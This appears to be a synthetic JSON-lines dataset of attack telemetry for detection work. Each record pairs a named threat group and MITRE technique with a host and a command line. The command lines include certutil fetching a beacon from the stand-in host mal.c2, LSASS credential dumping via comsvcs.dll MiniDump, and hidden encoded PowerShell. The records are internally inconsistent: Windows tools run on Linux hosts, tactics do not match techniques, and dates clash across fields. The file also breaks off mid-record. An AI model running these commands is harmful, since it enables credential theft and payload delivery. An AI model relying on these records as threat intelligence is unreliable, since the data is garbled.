{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1021.006 using encrypted C2 technique.","sub_technique":"Windows Remote Management","tactic":["Exfiltration"],"technique_id":"T1021.006"},"event_id":"evt_fin7_20251126T171353000Z_0018247","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["LOLBin","Fileless","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.103.36.190","name":"IAM-ROLE-8PUMWJR2JU","os":"Windows 11"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18247FIN7T1021.006"},"network":{"domain":"cdn-content.com","dst_ip":"1.66.190.71","dst_port":8443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"cmstp.exe","parent_name":"winlogon.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-03-21T04:41:18.000Z","user":{"name":"svc_o0o0doy4h8b1","sid":"S-1-5-21-310472353-127366126-2014"}} |
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1546.003 using LOLBin technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Reconnaissance","Command and Control"],"technique_id":"T1546.003"},"event_id":"evt_apt41_20250706T161127000Z_0018249","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["Fileless","TLS","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.254.174.110","name":"EC2-INST-JNF7VRDAAG","os":"Amazon Linux 2"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18249APT41T1546.003"},"network":{"domain":"update.microsoft.com","dst_ip":"1.48.205.17","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"mshta.exe","parent_name":"winlogon.exe"},"source":"Windows Security Log","timestamp":"2025-11-04T08:17:10.000Z","user":{"name":"CORP\\mzp99n6t3q0c","sid":"S-1-5-21-152184068-532389657-4117"}} |
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1546.003 using cloud-native technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Credential Access","Persistence","Impact"],"technique_id":"T1546.003"},"event_id":"evt_scatteredspider_20250720T154344000Z_0018251","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["Fileless","Base64","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.174.241.160","name":"APP-WEB-9WSUPACBWI","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18251Scattered SpiderT1546.003"},"network":{"domain":"github.com","dst_ip":"1.138.170.3","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"certutil.exe","parent_name":"winlogon.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-11-08T05:56:35.000Z","user":{"name":"azuread\\bu5x27x6l78w","sid":"S-1-5-21-364067122-991712742-8859"}} |
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1059.001 using encrypted C2 technique.","sub_technique":"PowerShell","tactic":["Persistence"],"technique_id":"T1059.001"},"event_id":"evt_apt41_20261112T050251000Z_0018253","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["WMI","LOLBin","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.180.208.23","name":"APP-WEB-LFQMF47AJV","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18253APT41T1059.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.153.103.74","dst_port":8443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"cmstp.exe","parent_name":"winlogon.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-07-11T13:15:06.000Z","user":{"name":"CORP\\524c5nrigcrh","sid":"S-1-5-21-294167636-597009731-1920"}} |
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1003.001 using encrypted C2 technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Command and Control"],"technique_id":"T1003.001"},"event_id":"evt_apt29_20261006T025634000Z_0018255","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["Fileless","Base64","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.175.186.242","name":"EC2-INST-HVFXK19JS3","os":"Ubuntu 22.04"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18255APT29T1003.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.172.38.153","dst_port":445,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"certutil.exe","parent_name":"winlogon.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-12-19T02:48:47.000Z","user":{"name":"svc_1nnfi3laj5ax","sid":"S-1-5-21-967511553-541612762-5341"}} |
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1566.001 using LOLBin technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Lateral Movement","Command and Control","Collection"],"technique_id":"T1566.001"},"event_id":"evt_mustangpanda_20250914T064019000Z_0018257","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["WMI","Fileless","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.9.236.119","name":"EC2-INST-7CGIKEHNA0","os":"Amazon Linux 2"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18257Mustang PandaT1566.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.46.40.173","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"mshta.exe","parent_name":"explorer.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-09-26T17:11:09.000Z","user":{"name":"CORP\\b25yds7jsovj","sid":"S-1-5-21-343166249-133590637-8411"}} |
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1098.004 using fileless technique.","sub_technique":"SSH Authorized Keys","tactic":["Execution","Credential Access","Defense Evasion"],"technique_id":"T1098.004"},"event_id":"evt_apt41_20261123T172615000Z_0018259","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["Base64","JA3 Spoof","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.1.241.169","name":"IAM-ROLE-W3R3XC9JLK","os":"Amazon Linux 2"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18259APT41T1098.004"},"network":{"domain":"github.com","dst_ip":"1.75.114.230","dst_port":3389,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1464 C:\\temp\\lsass.dmp full","name":"powershell.exe","parent_name":"services.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-04-28T00:06:18.000Z","user":{"name":"i-unudviv1a0hm","sid":"S-1-5-21-912694834-203141649-2863"}} |
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1566.001 using fileless technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Command and Control","Privilege Escalation"],"technique_id":"T1566.001"},"event_id":"evt_fin7_20250920T023611000Z_0018261","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["Fileless","WMI","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.127.0.119","name":"DB-ORACLE-4LSHQ52QO2","os":"Windows Server 2022"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18261FIN7T1566.001"},"network":{"domain":"github.com","dst_ip":"1.22.2.62","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"certutil.exe","parent_name":"explorer.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-07-30T01:59:14.000Z","user":{"name":"azuread\\w7o71hq15q6d","sid":"S-1-5-21-498472054-351014715-1987"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1546.003 using fileless technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Defense Evasion","Privilege Escalation","Exfiltration"],"technique_id":"T1546.003"},"event_id":"evt_volttyphoon_20250208T121037000Z_0018263","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["TLS","Base64","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.93.67.42","name":"WIN-FIN-SRV-L2BF9NMCVZ","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18263Volt TyphoonT1546.003"},"network":{"domain":"github.com","dst_ip":"1.178.79.157","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"certutil.exe","parent_name":"explorer.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-08-15T11:11:48.000Z","user":{"name":"svc_esv1c830o8xs","sid":"S-1-5-21-234259208-945543192-1505"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1059.001 using cloud-native technique.","sub_technique":"PowerShell","tactic":["Lateral Movement"],"technique_id":"T1059.001"},"event_id":"evt_lapsus_20260213T042523000Z_0018265","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["LOLBin","Fileless","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.106.148.28","name":"DB-ORACLE-6FCMPH2YII","os":"Windows 11"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18265Lapsus$T1059.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.101.150.41","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"mshta.exe","parent_name":"svchost.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-04-15T13:09:20.000Z","user":{"name":"azuread\\tixt6u2y5ml7","sid":"S-1-5-21-921953304-641135240-5177"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1484.001 using LOLBin technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Reconnaissance","Persistence","Defense Evasion"],"technique_id":"T1484.001"},"event_id":"evt_volttyphoon_20250927T095702000Z_0018267","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["LOLBin","JA3 Spoof","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.22.229.205","name":"WIN-FIN-SRV-S9P93SJGGU","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18267Volt TyphoonT1484.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.175.7.100","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3479 C:\\temp\\lsass.dmp full","name":"bitsadmin.exe","parent_name":"explorer.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-08-07T17:59:34.000Z","user":{"name":"CORP\\nvyue8q48l9f","sid":"S-1-5-21-217525662-507238051-6700"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1566.001 using cloud-native technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Initial Access","Lateral Movement","Discovery"],"technique_id":"T1566.001"},"event_id":"evt_lapsus_20260731T110114000Z_0018269","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","Base64","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.83.179.232","name":"IAM-ROLE-RJZFJEQWAD","os":"Amazon Linux 2"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18269Lapsus$T1566.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.189.111.40","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"certutil.exe","parent_name":"winlogon.exe"},"source":"Windows Security Log","timestamp":"2026-03-16T18:13:12.000Z","user":{"name":"arn:aws:iam::pfgqinq6djtk","sid":"S-1-5-21-930978893-920816878-1170"}} |
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1531 using fileless technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Persistence","Privilege Escalation","Command and Control"],"technique_id":"T1531"},"event_id":"evt_scatteredspider_20250826T160618000Z_0018271","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["Fileless","JA3 Spoof","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.77.235.229","name":"DB-ORACLE-LNJ8HJYYWY","os":"Windows 11"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18271Scattered SpiderT1531"},"network":{"domain":"github.com","dst_ip":"1.110.163.108","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"bitsadmin.exe","parent_name":"winlogon.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-04-07T08:47:18.000Z","user":{"name":"arn:aws:iam::7e5r9wusccr6","sid":"S-1-5-21-354745552-271458847-6354"}} |
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1546.003 using LOLBin technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Reconnaissance","Execution"],"technique_id":"T1546.003"},"event_id":"evt_scatteredspider_20251227T142306000Z_0018273","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","LOLBin","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.212.96.60","name":"EC2-INST-2ZHYNW5WJE","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18273Scattered SpiderT1546.003"},"network":{"domain":"github.com","dst_ip":"1.149.145.3","dst_port":3389,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"powershell.exe","parent_name":"svchost.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-06-16T02:48:32.000Z","user":{"name":"CORP\\ig2b84en8g1s","sid":"S-1-5-21-144741280-787759384-9231"}} |
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1003.001 using encrypted C2 technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Lateral Movement","Exfiltration"],"technique_id":"T1003.001"},"event_id":"evt_apt29_20260111T040326000Z_0018275","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["WMI","JA3 Spoof","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.14.45.97","name":"DB-ORACLE-71OR3OOK1L","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18275APT29T1003.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.33.206.87","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3274 C:\\temp\\lsass.dmp full","name":"certutil.exe","parent_name":"services.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-05-14T19:52:16.000Z","user":{"name":"i-ni2om7cctmdq","sid":"S-1-5-21-825411763-313298552-9544"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1071.001 using cloud-native technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Impact","Collection","Defense Evasion"],"technique_id":"T1071.001"},"event_id":"evt_volttyphoon_20250130T091528000Z_0018277","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","Fileless","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.161.199.23","name":"IAM-ROLE-QCGHF0Z3TZ","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18277Volt TyphoonT1071.001"},"network":{"domain":"github.com","dst_ip":"1.161.51.84","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2325 C:\\temp\\lsass.dmp full","name":"certutil.exe","parent_name":"explorer.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-01-11T14:37:30.000Z","user":{"name":"azuread\\szotkg0qa573","sid":"S-1-5-21-177265808-678676736-5676"}} |
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1021.006 using cloud-native technique.","sub_technique":"Windows Remote Management","tactic":["Impact"],"technique_id":"T1021.006"},"event_id":"evt_mustangpanda_20250929T141923000Z_0018279","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["Base64","WMI","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.251.189.237","name":"EC2-INST-B3UHKTD1EN","os":"Ubuntu 22.04"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18279Mustang PandaT1021.006"},"network":{"domain":"aws.amazon.com","dst_ip":"1.78.252.53","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3301 C:\\temp\\lsass.dmp full","name":"mshta.exe","parent_name":"winlogon.exe"},"source":"Windows Security Log","timestamp":"2025-05-08T18:48:28.000Z","user":{"name":"arn:aws:iam::ypzogq0s0uui","sid":"S-1-5-21-129705951-576027701-9109"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1566.001 using LOLBin technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Privilege Escalation"],"technique_id":"T1566.001"},"event_id":"evt_lapsus_20250328T121214000Z_0018281","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["Fileless","WMI","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.217.55.162","name":"AZURE-VM-J8JMPCRW0J","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18281Lapsus$T1566.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.88.141.201","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"mshta.exe","parent_name":"explorer.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-03-31T01:10:02.000Z","user":{"name":"svc_qpbqwgg9koo6","sid":"S-1-5-21-362090792-866985087-2027"}} |
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1531 using LOLBin technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Privilege Escalation"],"technique_id":"T1531"},"event_id":"evt_mustangpanda_20260324T191832000Z_0018283","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["LOLBin","WMI","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.75.177.34","name":"APP-WEB-33POW76LXI","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18283Mustang PandaT1531"},"network":{"domain":"aws.amazon.com","dst_ip":"1.146.172.65","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"bitsadmin.exe","parent_name":"services.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-05-24T21:29:10.000Z","user":{"name":"CORP\\2bz1aum6ygnt","sid":"S-1-5-21-528873030-626138633-1265"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1021.006 using encrypted C2 technique.","sub_technique":"Windows Remote Management","tactic":["Credential Access","Discovery","Reconnaissance"],"technique_id":"T1021.006"},"event_id":"evt_lapsus_20250113T033042000Z_0018285","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["LOLBin","TLS","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.121.102.79","name":"IAM-ROLE-MY1IYPM00A","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18285Lapsus$T1021.006"},"network":{"domain":"github.com","dst_ip":"1.155.105.219","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"cmstp.exe","parent_name":"services.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-01-16T06:19:16.000Z","user":{"name":"svc_brojpnfkzi2q","sid":"S-1-5-21-153009468-239457442-1822"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1566.001 using LOLBin technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Execution"],"technique_id":"T1566.001"},"event_id":"evt_lapsus_20250526T002455000Z_0018287","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["LOLBin","Fileless","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.228.242.239","name":"AZURE-VM-I7813RFLTR","os":"Windows Server 2022"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18287Lapsus$T1566.001"},"network":{"domain":"github.com","dst_ip":"1.129.20.115","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"cmstp.exe","parent_name":"winlogon.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-05-02T14:52:28.000Z","user":{"name":"i-lquhyy0o54ib","sid":"S-1-5-21-360601187-989026851-7209"}} |
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1071.001 using fileless technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Collection"],"technique_id":"T1071.001"},"event_id":"evt_apt41_20260802T135220000Z_0018289","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["WMI","Fileless","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.239.54.125","name":"WIN-FIN-SRV-OBECFYI2LG","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18289APT41T1071.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.121.159.79","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1962 C:\\temp\\lsass.dmp full","name":"mshta.exe","parent_name":"winlogon.exe"},"source":"Windows Security Log","timestamp":"2025-11-08T14:52:11.000Z","user":{"name":"CORP\\shn5rrfwfotn","sid":"S-1-5-21-699964827-529649879-9708"}} |
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1071.001 using LOLBin technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Exfiltration","Initial Access","Reconnaissance"],"technique_id":"T1071.001"},"event_id":"evt_apt41_20260519T052126000Z_0018291","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["TLS","Base64","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.138.255.223","name":"APP-WEB-0T42AH5C5I","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18291APT41T1071.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.18.94.241","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"rundll32.exe","parent_name":"winlogon.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-12-09T07:18:44.000Z","user":{"name":"azuread\\i1vs32uhxz81","sid":"S-1-5-21-323709029-197201712-1792"}} |
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1566.001 using encrypted C2 technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Exfiltration","Initial Access","Lateral Movement"],"technique_id":"T1566.001"},"event_id":"evt_mustangpanda_20261022T100318000Z_0018293","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","WMI","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.66.153.76","name":"AZURE-VM-MBYY8QXKEN","os":"Windows 11"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18293Mustang PandaT1566.001"},"network":{"domain":"github.com","dst_ip":"1.119.182.147","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc 